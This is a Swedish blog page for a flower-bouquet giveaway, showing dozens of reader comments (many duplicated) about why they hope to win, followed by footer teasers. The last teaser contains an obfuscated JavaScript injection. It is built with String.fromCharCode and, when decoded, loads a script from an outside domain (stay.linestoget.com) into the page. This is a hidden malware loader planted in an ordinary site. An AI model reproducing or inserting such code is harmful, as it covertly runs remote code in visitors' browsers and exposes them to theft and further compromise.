 96. Vi är en grupp undersköterskor som jobbar i hemtjänsten, där vi gör allt för att hjälpa och förgylla dagarna för våra brukare. Vi älskar vårt jobb trots stressen som ofta är vår vardag. Det vore himmelriket att få förgylla lite i vår egen tillvaro med vackra blommor som möter oss varje gång vi kliver in på vår arbetsplats ☺

 97. Hej!
  I 4 år har vi försökt att sälja vårt hus, nu äntligen har allt gått i lås och vi ska flytta ”hem”.
  Tyvärr har vi gått med 250 tusen minus på huset och kommer därför i flera år få hålls en tuff budget vilket inte alltid är lätt med 3 små barn.
  Jag älskar snittblommor men kommer tyvärr inte kunna köpa mig det själv på väldigt länge!
  Att vinna detta hade betytt väldigt mycket för mig! Att kunna pryda vardagsrummet/köket med en härlig bukett hade gjort vår första tid i den nya staden lättare! Just nu känner vi oss väldigt glada över att vi äntligen ska flytta! Men det drar med sig så mycket, byte av förskola/skola, vart ska vi bo, tömma ett hus, Så det har varit många sömnlösa nätter! Och detta skulle göra vår vardag lite ljusare

 98. Hej!
  I 4 år har vi försökt att sälja vårt hus, nu äntligen har allt gått i lås och vi ska flytta ”hem”.
  Tyvärr har vi gått med 250 tusen minus på huset och kommer därför i flera år få hålls en tuff budget vilket inte alltid är lätt med 3 små barn.
  Jag älskar snittblommor men kommer tyvärr inte kunna köpa mig det själv på väldigt länge!
  Att vinna detta hade betytt väldigt mycket för mig! Att kunna pryda vardagsrummet/köket med en härlig bukett hade gjort vår första tid i den nya staden lättare! Just nu känner vi oss väldigt glada över att vi äntligen ska flytta! Men det drar med sig så mycket, byte av förskola/skola, vart ska vi bo, tömma ett hus, Så det har varit många sömnlösa nätter! Och detta skulle göra vår vardag lite ljusare

 99. Vore jättekul o säkert många mej som vill vara med o tävla men har inte facebook.
  Hoppas att vi kan få vara med ändå.
  Kram från en som gillar din blogg.

 100. Vore jättekul o säkert många mej som vill vara med o tävla men har inte facebook.
  Hoppas att vi kan få vara med ändå.
  Kram från en som gillar din blogg.

 101. Åh det skulle vara jättekul att vinna, mina tre prinsessor här hemma hade älskat att ha fina blommor på bordet. Jag är en sån som tycker det är så fint med blommor och att jag ska köpa, men där tar det stopp för jag kommer aldrig till saken. Är en ekonomisk fråga med, prioriterar tyvärr inte det även om det skulle lyfta hemmet ? vi håller alla våra 8 timmar här hemma

 102. Åhhhh vilken tävling! Har förmånen att bo granne med min äldste son och hans flickvän. Köper alltid blommor till oss båda varje fredag för att låta oss få något vackert att titta på under helgen. Så skulle jag vinna så glädjer du även min son för jag delar så klart med mig till de bästa jag har i livet! Mina barn! Hoppas nu på tur! Kram från en mamma till en annan mamma

 103. Hej My! Vilken underbar tävling! Nu har jag delat tävlingen på min Facebook och hoppas på vinst. Hur underbart vore det inte att ha färska, väldoftande blommor varje vecka?! Håller tummarna! Kram Anna

 104. Åh det skulle vara jättekul att vinna, mina tre prinsessor här hemma hade älskat att ha fina blommor på bordet. Jag är en sån som tycker det är så fint med blommor och att jag ska köpa, men där tar det stopp för jag kommer aldrig till saken. Är en ekonomisk fråga med, prioriterar tyvärr inte det även om det skulle lyfta hemmet 🙂 vi håller alla våra 8 timmar här hemma

 105. Åhhhh vilken tävling! Har förmånen att bo granne med min äldste son och hans flickvän. Köper alltid blommor till oss båda varje fredag för att låta oss få något vackert att titta på under helgen. Så skulle jag vinna så glädjer du även min son för jag delar så klart med mig till de bästa jag har i livet! Mina barn! Hoppas nu på tur! Kram från en mamma till en annan mamma

 106. Hej My! Vilken underbar tävling! Nu har jag delat tävlingen på min Facebook och hoppas på vinst. Hur underbart vore det inte att ha färska, väldoftande blommor varje vecka?! Håller tummarna! Kram Anna

 107. Gillat och delat på Facebook.
  Skulle gärna vilja vinna för att jag älskar blommor..deras färger, dofter och glädjespridande effekt

 108. Jag skulle vilja vinna dessa buketter för att ge mig och min ”operationskompis” Sofia en vacker avlastning på tunga dagar. Vi har båda
  opererats för svåra whiplashskador och läkningen tar tid med svåra nervsystem. I dag har det gått en månad så det är dags att vi får lysa upp våra dagar med något fint

 109. Jag känner verkligen att jag skulle behöva denna vinst, just nu borde livet vara på topp dock får den känsla man har inombords en att må på ett helt annat sätt. Blommor skulle kanske pigga upp de dagar som behöver ett extra lyft just nu.

 110. Gillat och delat på Facebook.
  Skulle gärna vilja vinna för att jag älskar blommor..deras färger, dofter och glädjespridande effekt

 111. Jag skulle vilja vinna dessa buketter för att ge mig och min ”operationskompis” Sofia en vacker avlastning på tunga dagar. Vi har båda
  opererats för svåra whiplashskador och läkningen tar tid med svåra nervsystem. I dag har det gått en månad så det är dags att vi får lysa upp våra dagar med något fint

 112. Jag känner verkligen att jag skulle behöva denna vinst, just nu borde livet vara på topp dock får den känsla man har inombords en att må på ett helt annat sätt. Blommor skulle kanske pigga upp de dagar som behöver ett extra lyft just nu.

 113. Långtidssjukskriven och mamma till en underbar treåring. Blommor är tyvärr inget som ekonomin tillåter. Men jag skulle bli otroligt glad om jag vann

 114. Långtidssjukskriven och mamma till en underbar treåring. Blommor är tyvärr inget som ekonomin tillåter. Men jag skulle bli otroligt glad om jag vann

 115. efter ett nyligt besked om en glutendiagnos som kommer finnas alla år, sliter vi nu varenda dag vårt hår. För att gossen ska varenda dag få rätt mat, och det är inte lätt att få upp det på fat. Tänk att på bordet få ställa ett vackert arrangemang från dig, det skulle glädja oss och framför allt mig ❤️

 116. efter ett nyligt besked om en glutendiagnos som kommer finnas alla år, sliter vi nu varenda dag vårt hår. För att gossen ska varenda dag få rätt mat, och det är inte lätt att få upp det på fat. Tänk att på bordet få ställa ett vackert arrangemang från dig, det skulle glädja oss och framför allt mig ❤️

 117. delat!
  Jag skulle vilja vinna då jag älskar blommor och finns inget som är lika bra på att lysa upp ett hem som blommor!
  Jag och min sambo håller på att bygga ut vårt hus och vore fantastiskt att fixa hemmet med blommor bland all oreda!

 118. Hej My.
  Först vill jag bara hälsa från min son till dig (han är 7 år) att han tycker du har världens snyggaste bil. Rosa ska han också ha på sin bil när han blir stor

 119. delat!
  Jag skulle vilja vinna då jag älskar blommor och finns inget som är lika bra på att lysa upp ett hem som blommor!
  Jag och min sambo håller på att bygga ut vårt hus och vore fantastiskt att fixa hemmet med blommor bland all oreda!

 120. Hej My.
  Först vill jag bara hälsa från min son till dig (han är 7 år) att han tycker du har världens snyggaste bil. Rosa ska han också ha på sin bil när han blir stor

 121. Hej My!
  Nu blir min fru väldigt snopen ska du veta. Hon läste högt för mig igår om dina fina blommor och att det inte är någon idé att tävla. Men nu har jag hittat hit och vill gärna med din hjälp överraska henne. En underbar fru som är väl värd dessa blommor. Jag är alldeles för dålig på att både överraska och ge blommor,så nu My håller jag tummarna.
  Thomas

 122. Hej My!
  Nu blir min fru väldigt snopen ska du veta. Hon läste högt för mig igår om dina fina blommor och att det inte är någon idé att tävla. Men nu har jag hittat hit och vill gärna med din hjälp överraska henne. En underbar fru som är väl värd dessa blommor. Jag är alldeles för dålig på att både överraska och ge blommor,så nu My håller jag tummarna.

  Thomas

 123. Jag är gift med en man som tycker att blommor är världens mest onödiga inköp! Jag får aldrig blommor om jag inte köper dom själv…
  Hade varit underbart att njuta av fina, härliga blommor i 4 veckor. Förhoppningsvis ändrar sig mannen när han ser hur fint det är…

 124. Jag är gift med en man som tycker att blommor är världens mest onödiga inköp! Jag får aldrig blommor om jag inte köper dom själv…
  Hade varit underbart att njuta av fina, härliga blommor i 4 veckor. Förhoppningsvis ändrar sig mannen när han ser hur fint det är…

 125. Hos oss blir blommor på bordet om jag köper dem själv, min man är bättre på allt knappar och som låter. Vore härligt att förgylla vårt hem med vackra blommor nu när det oftast är regnigt och grått ute. Vore roligt att överraska min man och att HAN får blommor varje vecka. Sedan hoppas jag det ger mersmak… Det som köps mest hemma hos oss är mjölk, bröd och frukt då vi har ett glatt gäng ungar med härliga kompisar som gärna hänger i vårt hus. Vill gärna vinna för att få in lite färg och romantik. Gillar och delar.

 126. Hos oss blir blommor på bordet om jag köper dem själv, min man är bättre på allt knappar och som låter. Vore härligt att förgylla vårt hem med vackra blommor nu när det oftast är regnigt och grått ute. Vore roligt att överraska min man och att HAN får blommor varje vecka. Sedan hoppas jag det ger mersmak… Det som köps mest hemma hos oss är mjölk, bröd och frukt då vi har ett glatt gäng ungar med härliga kompisar som gärna hänger i vårt hus. Vill gärna vinna för att få in lite färg och romantik. Gillar och delar.

 127. Delat på facebook!
  Hoppas på tur nu då livet inte alltid är en dans på rosor och med en blivande kass ekonomi så blir levande blommor på bordet ett minne blott… ?

 128. Delat på facebook!
  Hoppas på tur nu då livet inte alltid är en dans på rosor och med en blivande kass ekonomi så blir levande blommor på bordet ett minne blott… 😉

 129. Med en fräsch blomsterbukett då och då kan göra, att jag som singel ändå kan känna mig uppvaktad av ”någon” och det känns mycket lättare att vara i ensamheten då. Jag kan ju låtsas att jag är uppvaktad av någon då ?

 130. Med en fräsch blomsterbukett då och då kan göra, att jag som singel ändå kan känna mig uppvaktad av ”någon” och det känns mycket lättare att vara i ensamheten då. Jag kan ju låtsas att jag är uppvaktad av någon då 🙂

 131. Hej!
  Vilken fin tävling! Vinner jag blommor nu, ska min älskade dotter få dom av mig. Hon har kämpat sig igenom mycket svår cancer och jag är så otroligt glad och tacksam att hon lever idag. Vi har gråtit ihop många gånger, men nu när hon tagit sig igenom den fruktansvärda cancerresan så skrattar vi ihop istället. Hon är verkligen värd härliga blommor som piggar upp henne. Håller nu alla tummar och tår!!!
  Kram Birgitta

 132. Hejsan!
  Är med i denna fina tävling och hoppas på turen nu. Skulle vara helt underbart att min underbara mamma skulle få fina blommor hem till sig. Hon har vårdat mig i hemmet när jag var sängliggande i svår cancer. Hon är den bästa mamma man kan ha och jag älskar henne så. Blommorna skulle vara ett stort TACK från mig till henne! Hoppas nu att drömmen blir sann och jag får överraska henne. Hoppas hoppas!!! Har delat tävlingen på Facebook med namn Madelene Abrahamsson och på Instagram som madelene_abrahamsson
  Kram Madelene

 133. Hej!

  Vilken fin tävling! Vinner jag blommor nu, ska min älskade dotter få dom av mig. Hon har kämpat sig igenom mycket svår cancer och jag är så otroligt glad och tacksam att hon lever idag. Vi har gråtit ihop många gånger, men nu när hon tagit sig igenom den fruktansvärda cancerresan så skrattar vi ihop istället. Hon är verkligen värd härliga blommor som piggar upp henne. Håller nu alla tummar och tår!!!

  Kram Birgitta

 134. Hejsan!

  Är med i denna fina tävling och hoppas på turen nu. Skulle vara helt underbart att min underbara mamma skulle få fina blommor hem till sig. Hon har vårdat mig i hemmet när jag var sängliggande i svår cancer. Hon är den bästa mamma man kan ha och jag älskar henne så. Blommorna skulle vara ett stort TACK från mig till henne! Hoppas nu att drömmen blir sann och jag får överraska henne. Hoppas hoppas!!! Har delat tävlingen på Facebook med namn Madelene Abrahamsson och på Instagram som madelene_abrahamsson

  Kram Madelene

 135. Älskar blommor, speciellt nya fräscha snittblommor -Lovely. Tulpaner o mimosa det är sol för sinnet, lukten får mig att vakna ur idéet o vårkänslorna faller på plats!! <3 När jag köper färska blommor till mig själv köper jag alltid 2 buketter, en till mig o en ännu vackrare bukett som pryder min dotters grav (sommar, vinter höst el vår spelar ingen roll). I blommor bor det kärlek o det förtjänar alla människor!! <3

 136. Älskar blommor, speciellt nya fräscha snittblommor -Lovely. Tulpaner o mimosa det är sol för sinnet, lukten får mig att vakna ur idéet o vårkänslorna faller på plats!! <3 När jag köper färska blommor till mig själv köper jag alltid 2 buketter, en till mig o en ännu vackrare bukett som pryder min dotters grav (sommar, vinter höst el vår spelar ingen roll). I blommor bor det kärlek o det förtjänar alla människor!! <3

 137. Hej!
  Måste först bara säga att du är en inspirerande mamma/företagare/bloggerska (lite positiv feedback mår vi alla bra av

 138. Hej!
  Måste först bara säga att du är en inspirerande mamma/företagare/bloggerska (lite positiv feedback mår vi alla bra av

 139. Jag vill peppa mig själv då jag stressat lite för mycket på sistone:
  Vackra blommor du förtjänar att vinna
  För du är en sådan toppenfru och mor
  Du behöver inte vara någon superkvinna
  Nej du duger långt mer än du tror
  Har delat på instagram där jag heter carros_corner ?

 140. Jag vill peppa mig själv då jag stressat lite för mycket på sistone:

  Vackra blommor du förtjänar att vinna
  För du är en sådan toppenfru och mor
  Du behöver inte vara någon superkvinna
  Nej du duger långt mer än du tror

  Har delat på instagram där jag heter carros_corner 🙂

 141. Jag är så imponerad och beundrar din fantastiska energi och ditt entreprenörskap.
  Jag är ofta och besöker din butik här på Öland och det är lika härligt varje gång!!! Det är underbart med blommor och växter och hos dig får jag inspiration. Jag älskar att ha färska blommor eller någon häftig grön växt ute eller inne! Lycka till i din fortsatta karriär! Riggan i Färjestaden

 142. Vore toppen och få vinna underbara färska blommor.
  Skulle dela med mig vinsten med min mamma som alltid ställer upp i vårt och tort.
  Kul med din blogg med massa tips om allt som har med blommor och göra med!

 143. Jag är så imponerad och beundrar din fantastiska energi och ditt entreprenörskap.
  Jag är ofta och besöker din butik här på Öland och det är lika härligt varje gång!!! Det är underbart med blommor och växter och hos dig får jag inspiration. Jag älskar att ha färska blommor eller någon häftig grön växt ute eller inne! Lycka till i din fortsatta karriär! Riggan i Färjestaden

 144. Vore toppen och få vinna underbara färska blommor.
  Skulle dela med mig vinsten med min mamma som alltid ställer upp i vårt och tort.
  Kul med din blogg med massa tips om allt som har med blommor och göra med!

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/